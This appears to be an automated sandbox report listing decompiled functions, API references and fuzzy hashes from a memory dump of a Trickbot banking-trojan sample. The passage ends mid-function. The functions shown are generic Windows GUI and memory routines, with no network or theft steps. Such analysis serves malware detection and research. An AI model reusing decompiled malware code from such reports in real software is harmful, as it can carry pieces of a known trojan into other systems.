Instruction ID: 2c9188706850b99474bb3fa86ac7d3974e7e0159557212c360b896dc1d203508
Opcode Fuzzy Hash: c2f9182dacb039938dbfeebd1a145ead52bc5e7b718ac6c8aac088017c69c67c
Instruction Fuzzy Hash: 51F0AF32141218BBDB109FA59C09BAB3B68EB15B10F449166BE185A1E0C7B49D11CFAE

Uniqueness

Uniqueness Score: -1.00%

Function 00432990, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00432990(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t1 = _t15 + 0x14; // 0x1c5398
				_t5 =  *_t1;
				if(_t5 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t5 + 4));
						E00432C5C(_t15, _t5, 0);
						_t5 = _t14;
					} while (_t14 != 0);
				}
				_t3 = _t15 + 0x10; // 0x1cbf10
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection(_t15 + 0x1c);
				return _t6;
			}

0x00432991
0x00432994
0x00432999
0x0043299c
0x0043299c
0x004329a2
0x004329a2
0x004329a7
0x004329a9
0x004329a9
0x004329b1
0x004329b8
0x004329b8
0x004329a9
0x004329bc
0x004329bc
0x004329c1
0x004329ca
0x004329cd
0x004329d4
0x004329d4
0x004329de
0x004329e6

APIs

TlsFree.KERNEL32(00000000,?,?,00432E9D,00000000,00000001), ref: 0043299C
GlobalHandle.KERNEL32(001CBF10), ref: 004329C4
GlobalUnlock.KERNEL32(00000000,?,?,00432E9D,00000000,00000001), ref: 004329CD
GlobalFree.KERNEL32(00000000), ref: 004329D4
DeleteCriticalSection.KERNEL32(0044B484,?,?,00432E9D,00000000,00000001), ref: 004329DE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: c69d353ba9ce2d79b22686ab7108aaff9864a546e41db3e0ee4118bc377a497d
Instruction ID: abedf2684a00f37dac84e1b8fe2f22d1e9d2dc83754f70f29763ab916e8b2090
Opcode Fuzzy Hash: c69d353ba9ce2d79b22686ab7108aaff9864a546e41db3e0ee4118bc377a497d
Instruction Fuzzy Hash: 31F054713006006FD7209B39AD48B6B76ADAF88721F15155AF855D3391CBB8DC02866D

Uniqueness

Uniqueness Score: -1.00%

Function 00436282, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436282(void* __ecx) {
				int _t22;

				_t22 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _t22;
			}

0x00436296
0x00436298
0x004362c4
0x0043629a
0x004362ad
0x004362b9
0x004362bf
0x004362c1
0x004362d0

APIs

SaveDC.GDI32(?), ref: 00436290
GetStockObject.GDI32(0000000D), ref: 0043629D
SelectObject.GDI32(00000000,00000000), ref: 004362AD
SaveDC.GDI32(00000000), ref: 004362B2
SelectObject.GDI32(00000000,?), ref: 004362BF

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Object$SaveSelect$Stock
String ID:
API String ID: 2785865535-0
Opcode ID: 5f4e7535a614563e03e4b539d9225fb8cf9caa6961f17facdb117b74df09aca8
Instruction ID: 3ebbcc448a9f6894ef9655ec6489c54b754031be1484e3425d52e819444ca3b9
Opcode Fuzzy Hash: 5f4e7535a614563e03e4b539d9225fb8cf9caa6961f17facdb117b74df09aca8
Instruction Fuzzy Hash: 4AF08231100705AFDB202F55DC49927BBE5EB44711B01853DE14652560CBB2BC09DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00423A9E, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00423A9E(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct tagRECT _v44;
				signed int _v48;
				signed int _v52;
				struct tagRECT _v68;
				intOrPtr _t173;
				intOrPtr* _t174;
				intOrPtr _t177;
				signed char _t179;
				intOrPtr* _t181;
				signed char _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t202;
				signed int _t205;
				signed int _t206;
				signed int _t215;
				signed int _t224;
				intOrPtr* _t227;
				intOrPtr* _t232;
				intOrPtr _t233;
				signed int _t250;
				signed int _t252;
				signed int _t256;
				signed int _t260;
				void* _t263;
				signed int _t266;
				signed int _t268;
				intOrPtr _t272;
				signed int _t275;
				signed int _t279;

				_t263 = __edx;
				_t227 = __ecx;
				_t266 = 0;
				_push(0);
				_push(0);
				_push(0x418);
				_v8 = 0;
				_v52 = 0;
				_v48 = 0;
				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
				_v28 = _t275;
				if(_t275 != 0) {
					_t177 = E0041BDEB(_t275 + _t275 * 4 << 2);
					_v8 = _t177;
					if(_t275 > 0) {
						_v12 = _t177;
						do {
							E00423524(_t227, _t266, _v12);
							_v12 = _v12 + 0x14;
							_t266 = _t266 + 1;
						} while (_t266 < _t275);
						_t268 = 0;
						if(_t275 > 0) {
							_t179 =  *(_t227 + 0x64);
							if((_t179 & 0x00000002) == 0) {
								_t256 = _t179 & 0x00000004;
								_v44.bottom = _t256;
								if(_t256 == 0) {
									L19:
									_push(_t268);
									asm("sbb eax, eax");
									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t215;
									_push(_t215);
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t268);
										_push( *((intOrPtr*)(_t227 + 0x54)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t179 & 0x00000001;
													if((_t179 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v44);
													E00429BAB(_t227,  &_v44, _a8 & 0x00000002);
													_t224 = _a8 & 0x00000020;
													__eflags = _t224;
													if(_t224 == 0) {
														_t260 = _v44.right - _v44.left;
														__eflags = _t260;
													} else {
														_t260 = _v44.bottom - _v44.top;
													}
													_push(_t224);
													_push(_t260 + _a12);
												}
											} else {
												_push(0);
												_push(0);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t275);
								_push(_v8);
								E00423941(_t227, _t263);
							}
							_push(_t275);
							_push(_v8);
							_push( &(_v44.right));
							_t181 = E00423745(_t227);
							_v52 =  *_t181;
							_v48 =  *((intOrPtr*)(_t181 + 4));
							if((_a8 & 0x00000040) != 0) {
								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
								_v20 = _t268;
								_v44.bottom =  *(_t227 + 0x84);
								if(_t275 > 0) {
									_t250 = _t275;
									_t202 = _v8 + 4;
									_v24 = _t202;
									do {
										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
											_t268 = _t268 + 1;
										}
										_t202 = _t202 + 0x14;
										_t250 = _t250 - 1;
									} while (_t250 != 0);
									if(_t268 > 0) {
										_t205 = E0041BDEB(_t268 + _t268 * 2 << 3);
										if(_t205 == 0) {
											_t205 = 0;
											__eflags = 0;
										} else {
											_a12 = _t268 - 1;
										}
										_v16 = _v16 & 0x00000000;
										_a12 = _a12 & 0x00000000;
										_v20 = _t205;
										_t67 = _t205 + 8; // 0x8
										_t272 = _t67;
										_t206 = _v24;
										_v12 = _t272;
										_v24 = _t206;
										do {
											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
												_t252 = _a12;
												 *((intOrPtr*)(_t272 - 8)) = _t252;
												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
												E004214BA(_t227,  &_v68);
												_v16 = _v16 + 1;
												asm("movsd");
												asm("movsd");
												_v12 = _v12 + 0x18;
												_t206 = _v24;
												asm("movsd");
												asm("movsd");
												_t275 = _v28;
												_t272 = _v12;
											}
											_a12 = _a12 + 1;
											_t206 = _t206 + 0x14;
											_v24 = _t206;
										} while (_a12 < _t275);
										_t268 = _v16;
									}
								}
								_t185 =  *(_t227 + 0x64);
								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
								}
								_a12 = _a12 & 0x00000000;
								_t308 = _t275;
								if(_t275 > 0) {
									_v16 = _v8;
									do {
										E00423543(_t227, _t308, _a12, _v16);
										_a12 = _a12 + 1;
										_v16 = _v16 + 0x14;
									} while (_a12 < _t275);
								}
								if(_t268 > 0) {
									_t187 = _v20;
									_v24 = _t268;
									_t113 = _t187 + 8; // 0x8
									_t279 = _t113;
									_a12 = _t279;
									do {
										_t188 = E0041B5B5(_t227,  *((intOrPtr*)(_t279 - 4)));
										_v28 = _t188;
										if(_t188 != 0) {
											GetWindowRect( *(_t188 + 0x1c),  &_v68);
											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
											E0041B784(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
											_t279 = _a12;
										}
										_t279 = _t279 + 0x18;
										_t130 =  &_v24;
										 *_t130 = _v24 - 1;
										_a12 = _t279;
									} while ( *_t130 != 0);
									E0041BE14(_v20);
								}
								 *(_t227 + 0x84) = _v44.bottom;
							}
							E0041BE14(_v8);
						}
					}
				}
				SetRectEmpty( &_v68);
				E00429BAB(_t227,  &_v68, _a8 & 0x00000002);
				_v48 = _v48 + _v68.top - _v68.bottom;
				_v52 = _v52 + _v68.left - _v68.right;
				_t232 = E00428D38( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t173 =  *_t232;
				_t233 =  *((intOrPtr*)(_t232 + 4));
				if(_v52 <= _t173) {
					_v52 = _t173;
				}
				if(_v48 <= _t233) {
					_v48 = _t233;
				}
				_t174 = _a4;
				 *_t174 = _v52;
				 *((intOrPtr*)(_t174 + 4)) = _v48;
				return _t174;
			}

0x00423a9e
0x00423aa7
0x00423aa9
0x00423aad
0x00423aae
0x00423aaf
0x00423ab4
0x00423ab7
0x00423aba
0x00423ac3
0x00423ac7
0x00423aca
0x00423ad7
0x00423adf
0x00423ae2
0x00423ae8
0x00423aeb
0x00423af1
0x00423af6
0x00423afa
0x00423afb
0x00423aff
0x00423b03
0x00423b09
0x00423b0e
0x00423b16
0x00423b19
0x00423b1c
0x00423b87
0x00423b8a
0x00423b8f
0x00423b91
0x00423b91
0x00423b96
0x00423b1e
0x00423b22
0x00423b81
0x00423b81
0x00423b82
0x00423b24
0x00423b28
0x00423b32
0x00423b36
0x00423b3c
0x00423b40
0x00423b7d
0x00423b7f
0x00000000
0x00000000
0x00000000
0x00000000
0x00423b42
0x00423b46
0x00423b59
0x00423b61
0x00423b61
0x00423b64
0x00423b71
0x00423b71
0x00423b66
0x00423b69
0x00423b69
0x00423b74
0x00423b7a
0x00423b7a
0x00423b38
0x00423b38
0x00423b39
0x00423b39
0x00423b2a
0x00423b2a
0x00423b2b
0x00423b2b
0x00423b28
0x00423b22
0x00423b97
0x00423b9a
0x00423b9d
0x00423b9d
0x00423ba2
0x00423ba6
0x00423bab
0x00423bac
0x00423bba
0x00423bbd
0x00423bc0
0x00423bcc
0x00423bd5
0x00423bd8
0x00423bdb
0x00423be4
0x00423be6
0x00423be9
0x00423bec
0x00423bf0
0x00423bf7
0x00423bf7
0x00423bf8
0x00423bfb
0x00423bfb
0x00423c00
0x00423c0d
0x00423c15
0x00423c1d
0x00423c1d
0x00423c17
0x00423c18
0x00423c18
0x00423c1f
0x00423c23
0x00423c27
0x00423c2a
0x00423c2a
0x00423c2d
0x00423c30
0x00423c33
0x00423c36
0x00423c3a
0x00423c41
0x00423c47
0x00423c4c
0x00423c55
0x00423c61
0x00423c69
0x00423c6c
0x00423c6d
0x00423c6e
0x00423c72
0x00423c75
0x00423c76
0x00423c77
0x00423c7a
0x00423c7a
0x00423c7d
0x00423c80
0x00423c86
0x00423c86
0x00423c8b
0x00423c8b
0x00423c00
0x00423c8e
0x00423c93
0x00423c9c
0x00423c9c
0x00423c9f
0x00423ca3
0x00423ca5
0x00423caa
0x00423cad
0x00423cb5
0x00423cba
0x00423cbd
0x00423cc1
0x00423cad
0x00423cc8
0x00423cca
0x00423ccd
0x00423cd0
0x00423cd0
0x00423cd3
0x00423cd6
0x00423cdb
0x00423ce2
0x00423ce5
0x00423cee
0x00423d11
0x00423d2d
0x00423d32
0x00423d32
0x00423d35
0x00423d38
0x00423d38
0x00423d3b
0x00423d3b
0x00423d43
0x00423d48
0x00423d4c
0x00423d4c
0x00423d55
0x00423d5a
0x00423b03
0x00423ae2
0x00423d5f
0x00423d72
0x00423d80
0x00423d89
0x00423d9c
0x00423da1
0x00423da6
0x00423da9
0x00423dab
0x00423dab
0x00423db1
0x00423db3
0x00423db3
0x00423db6
0x00423dbc
0x00423dc1
0x00423dc5

APIs

SetRectEmpty.USER32(?), ref: 00423B46
GetWindowRect.USER32(?,?), ref: 00423CEE
SetRectEmpty.USER32(?), ref: 00423D5F

Strings

@, xrefs: 00423BB3

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: 8b116a2d27c3ab3b887eb2d1501e76618caee2e8c6f71f1212b67f0297517312
Instruction ID: da19c17324a5d7ebd5f2a337ac845fc1532864cc082d3debe08a0ebf2618bd52
Opcode Fuzzy Hash: 8b116a2d27c3ab3b887eb2d1501e76618caee2e8c6f71f1212b67f0297517312
Instruction Fuzzy Hash: CDC15871A00229AFCF15CFA9D884AEEBBB4FF44315F44446AE815A7351D738AE01CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00403380, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00403380(void* __ecx, void* __eflags) {
				intOrPtr _v4;
				void* __esi;
				void* __ebp;
				void* _t11;
				signed int _t14;
				signed int _t15;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr _t36;
				void* _t60;
				void* _t62;
				intOrPtr* _t63;

				_t60 = __ecx;
				_t11 = E00402FA0(__eflags);
				_t66 = _t11;
				if(_t11 == 0) {
					_t31 = E00402D70(__ecx, E00402F20(_t66, E00402EF0(0x65, _t11)));
					_t62 = _t62 + 0x10;
					 *_t31();
				}
				CommandLineToArgvW(L"HELLO", 0);
				_t14 = E0042D57E(_v4);
				if(_t14 == 0xffffffff) {
					L12:
					_t15 = _t14 | 0xffffffff;
					__eflags = _t15;
					return _t15;
				} else {
					_push(0xe800);
					_t63 = _t62 - 0x10;
					_t33 = _t63;
					_t61 = _t60 + 0x138;
					_push(0x50402834);
					 *_t33 = 0;
					_push(0x800);
					_push(_t60);
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 8)) = 0;
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					_t14 = E00430BB8(_t60 + 0x138);
					if(_t14 == 0) {
						goto L12;
					} else {
						_t14 = E00430D22(_t61, 0x80);
						if(_t14 == 0) {
							goto L12;
						} else {
							_push(0xe800);
							_t34 = _t63 - 0x10;
							_t59 = _t60 + 0x1d4;
							_push(0x50401434);
							 *_t34 = 0;
							_push(0x800);
							_push(_t60);
							 *((intOrPtr*)(_t34 + 4)) = 0;
							 *((intOrPtr*)(_t34 + 8)) = 0;
							 *((intOrPtr*)(_t34 + 0xc)) = 0;
							_t14 = E00430BB8(_t60 + 0x1d4);
							if(_t14 == 0) {
								goto L12;
							} else {
								_t14 = E00430D22(_t59, 0x86);
								if(_t14 == 0) {
									goto L12;
								} else {
									_t35 = 0;
									do {
										E004236F8(_t59, 0, _t35, E004236D5(_t59, 0, _t35) | 0x00000006);
										_t35 = _t35 + 1;
									} while (_t35 < 3);
									E0041B705(_t61, "Standard");
									E0041B705(_t59, "Drawing");
									_t36 = _t60 + 0xbc;
									_t14 = E00431091(_t60, 0x50008200, 0xe801);
									if(_t14 == 0) {
										goto L12;
									} else {
										_t14 = E00431146(_t36, _t60, 0x447288, 4);
										if(_t14 == 0) {
											goto L12;
										} else {
											_push(0xf000);
											E00427FE0(_t61);
											_push(0xf000);
											E00427FE0(_t59);
											_push(0xf000);
											E0042EE69(_t60);
											E0042EEFE(_t60, _t61, 0, 0);
											E0042EEFE(_t60, _t59, 0, 0);
											return 0;
										}
									}
								}
							}
						}
					}
				}
			}

0x00403384
0x00403386
0x0040338b
0x0040338d
0x0040339e
0x004033a3
0x004033a6
0x004033a6
0x004033af
0x004033bc
0x004033c4
0x00403513
0x00403513
0x00403513
0x00403517
0x004033ca
0x004033ca
0x004033d1
0x004033d6
0x004033da
0x004033e0
0x004033e5
0x004033e9
0x004033ee
0x004033ef
0x004033f4
0x004033f7
0x004033fa
0x00403401
0x00000000
0x00403407
0x0040340e
0x00403415
0x00000000
0x0040341b
0x0040341b
0x00403427
0x0040342b
0x00403431
0x00403436
0x00403438
0x0040343d
0x0040343e
0x00403443
0x00403446
0x00403449
0x00403450
0x00000000
0x00403456
0x0040345d
0x00403464
0x00000000
0x0040346a
0x0040346a
0x0040346c
0x0040347a
0x0040347f
0x00403480
0x0040348c
0x00403498
0x0040349d
0x004034b0
0x004034b7
0x00000000
0x004034b9
0x004034c2
0x004034c9
0x00000000
0x004034cb
0x004034cb
0x004034d2
0x004034d7
0x004034de
0x004034e3
0x004034ea
0x004034f6
0x00403502
0x0040350d
0x0040350d
0x004034c9
0x004034b7
0x00403464
0x00403450
0x00403415
0x00403401

APIs

CommandLineToArgvW.SHELL32(HELLO,00000000), ref: 004033AF

Part of subcall function 00402EF0: LoadStringW.USER32(?,?,?,00000000), ref: 00402F0A

Strings

HELLO, xrefs: 004033AA
Drawing, xrefs: 00403491
Standard, xrefs: 00403485

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ArgvCommandLineLoadString
String ID: Drawing$HELLO$Standard
API String ID: 2666356611-1713542543
Opcode ID: 0031b0ec6b77e8492828d638738c1d146103e59a04ea5ae39133c4093b2901e6
Instruction ID: 36ed798fba729db1d9542e65fd8d07052538e9dceadaa623bcc80a55ad437f81
Opcode Fuzzy Hash: 0031b0ec6b77e8492828d638738c1d146103e59a04ea5ae39133c4093b2901e6
Instruction Fuzzy Hash: B531E03034030037EB143A764D96B7B65899FC4718F14893FBA06EA2C2EEBCA905826C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9C1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041C9C1(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					_t67 = GlobalLock( *__ecx);
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
					if(_v8 == 0) {
						 *_t67 =  *_t67 | 0x00000040;
					} else {
						_t67[3] = _t67[3] | 0x00000040;
					}
					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
					_t84 = E0041C844(_t67);
					_t75 = 0;
					_v20 = _t84;
					if(_v16 != 0) {
						_t75 = _t93 + 2 + E004050FE(_t84 + _t93) * 2;
					}
					_t26 = _t84 + 3; // 0x3
					_t55 = _t75 + _t26 & 0x000000fc;
					_v16 = _t75 + _t26 & 0x000000fc;
					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
					if(_v8 == 0) {
						_t81 = _t67[2];
					} else {
						_t81 = _t67[4];
					}
					if(_a4 != _t75 && _t81 > 0) {
						E00405BD0(_t86, _t55, _t67 - _t55 + _v12[1]);
						_t96 = _t96 + 0xc;
					}
					 *_v20 = _a8;
					E00405BD0(_v20 + _t93,  &_v84, _a4 - _t93);
					_t94 = _v12;
					_t94[1] = _t94[1] + _t86 - _v16;
					GlobalUnlock( *_t94);
					_t94[2] = _t94[2] & 0x00000000;
					_t61 = 1;
					return _t61;
				}
				return 0;
			}

0x0041c9cd
0x0041c9d0
0x0041c9e3
0x0041c9e7
0x0041c9f6
0x0041c9f9
0x0041ca00
0x0041c9fb
0x0041c9fb
0x0041c9fb
0x0041ca0a
0x0041ca0c
0x0041ca13
0x0041ca18
0x0041ca20
0x0041ca1a
0x0041ca1a
0x0041ca1a
0x0041ca3a
0x0041ca43
0x0041ca45
0x0041ca47
0x0041ca4d
0x0041ca59
0x0041ca59
0x0041ca60
0x0041ca64
0x0041ca6a
0x0041ca6d
0x0041ca74
0x0041ca7c
0x0041ca76
0x0041ca76
0x0041ca76
0x0041ca83
0x0041ca95
0x0041ca9a
0x0041ca9a
0x0041caaa
0x0041cab4
0x0041cab9
0x0041cac4
0x0041cac7
0x0041cacd
0x0041cad3
0x00000000
0x0041cad5
0x00000000

APIs

GlobalLock.KERNEL32 ref: 0041C9DD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041CA30
GlobalUnlock.KERNEL32(?), ref: 0041CAC7

Strings

@, xrefs: 0041CA1A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$ByteCharLockMultiUnlockWide
String ID: @
API String ID: 231414890-2766056989
Opcode ID: ea3a5fecfd012418335debcbf0f2eac21158dc171b8458669a65e634b9fa6453
Instruction ID: f6f5c9610b28406999a77ca1999340165e511c29f7404b35dac89977d312c6f6
Opcode Fuzzy Hash: ea3a5fecfd012418335debcbf0f2eac21158dc171b8458669a65e634b9fa6453
Instruction Fuzzy Hash: 7741EA71800219EBCB11DF94CC81AFFB7B4FF04354F14816AE815AB294D7749986CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004121F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004121F0(void* __eflags) {
				void* _t19;
				long _t24;
				void* _t27;
				void* _t31;
				signed int* _t35;
				intOrPtr _t36;
				signed short _t41;
				struct HWND__* _t43;
				signed int _t44;
				void* _t45;
				void* _t46;

				_t43 =  *(_t45 + 0x1c);
				_t19 = E004105F0(_t43);
				_t46 = _t45 + 4;
				if(_t19 == 0) {
					_t44 = 0;
					_t35 = 0x43edcc;
					GetClassNameA(_t43, _t46 + 0x10, 0x10);
					_t41 =  *((intOrPtr*)(_t46 + 0x28));
					do {
						if(( *_t35 & _t41) == 0) {
							goto L5;
						} else {
							_t7 = _t35 - 0x1c; // 0x43edb0
							if(lstrcmpA(_t7, _t46 + 0x10) == 0) {
								_t24 = GetWindowLongA(_t43, 0xfffffff0);
								_t36 =  *((intOrPtr*)(_t46 + 0x2c));
								_t27 =  *((intOrPtr*)((_t44 << 5) + 0x43edc8))(_t43, _t24, _t41, _t36,  *((intOrPtr*)(_t46 + 0x30)));
								if(_t27 != 1) {
									L12:
									asm("sbb eax, eax");
									return _t27 + 1;
								} else {
									if(_t36 != 1 ||  *0x44d362 != 0x10) {
										_t27 = E00410660(_t43,  *((intOrPtr*)(0x44dda0 + (_t44 + _t44 * 2) * 8)));
										goto L12;
									} else {
										_t31 = E00410800(_t43,  *((intOrPtr*)(0x44dda0 + (_t44 + _t44 * 2) * 8)));
										asm("sbb eax, eax");
										return _t31 + 1;
									}
								}
							} else {
								goto L5;
							}
						}
						goto L13;
						L5:
						_t35 =  &(_t35[8]);
						_t44 = _t44 + 1;
					} while (_t35 < "Unknown exception");
					return 0;
				} else {
					return 0;
				}
				L13:
			}

0x004121f5
0x004121fc
0x00412201
0x00412206
0x00412219
0x0041221c
0x00412221
0x00412227
0x0041222c
0x0041222f
0x00000000
0x00412231
0x00412235
0x00412242
0x0041225d
0x00412263
0x00412276
0x00412284
0x004122d1
0x004122d1
0x004122db
0x00412286
0x0041228a
0x004122c6
0x00000000
0x00412296
0x004122a3
0x004122ae
0x004122b8
0x004122b8
0x0041228a
0x00000000
0x00000000
0x00000000
0x00412242
0x00000000
0x00412244
0x00412244
0x00412247
0x00412248
0x00412259
0x00412208
0x00412211
0x00412211
0x00000000

APIs

GetClassNameA.USER32(?,?,00000010), ref: 00412221
lstrcmpA.KERNEL32(0043EDB0,?), ref: 0041223A

Strings

Unknown exception, xrefs: 00412248

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: Unknown exception
API String ID: 3770760073-410509341
Opcode ID: 7833a205476c4836d8e581b912ff83d28d29c44e87b547ca326807a22167338e
Instruction ID: 3f1245d66fc38af4b08061a0ac964daef4c554e82ad76547effc74892b3afcf9
Opcode Fuzzy Hash: 7833a205476c4836d8e581b912ff83d28d29c44e87b547ca326807a22167338e
Instruction Fuzzy Hash: 18213876B002181FE710AB59EC45CFF335CEB85320F84057BFC15C2260E6BA999986AA

Uniqueness

Uniqueness Score: -1.00%

Function 0042F000, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0042F000(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
